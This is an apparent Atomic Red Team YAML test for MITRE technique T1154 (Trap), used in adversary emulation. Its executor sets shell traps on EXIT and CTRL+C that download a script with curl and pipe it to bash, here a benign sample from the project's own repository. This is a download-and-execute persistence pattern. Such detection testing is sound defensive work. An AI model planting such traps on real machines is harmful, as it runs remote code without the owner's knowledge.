Michael Haag
24 lines
655 B
YAML
24 lines
655 B
YAML
---
|
|
attack_technique: T1154
|
|
display_name: Trap
|
|
|
|
atomic_tests:
|
|
- name: Trap
|
|
description: |
|
|
After exiting the shell, the script will download and execute.
|
|
|
|
After sending a keyboard interrupt (CTRL+C) the script will download and execute.
|
|
|
|
supported_platforms:
|
|
- macos
|
|
- centos
|
|
- ubuntu
|
|
- linux
|
|
|
|
executor:
|
|
name: sh
|
|
command: |
|
|
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' EXIT
|
|
exit
|
|
trap 'nohup curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1154/echo-art-fish.sh | bash' INT
|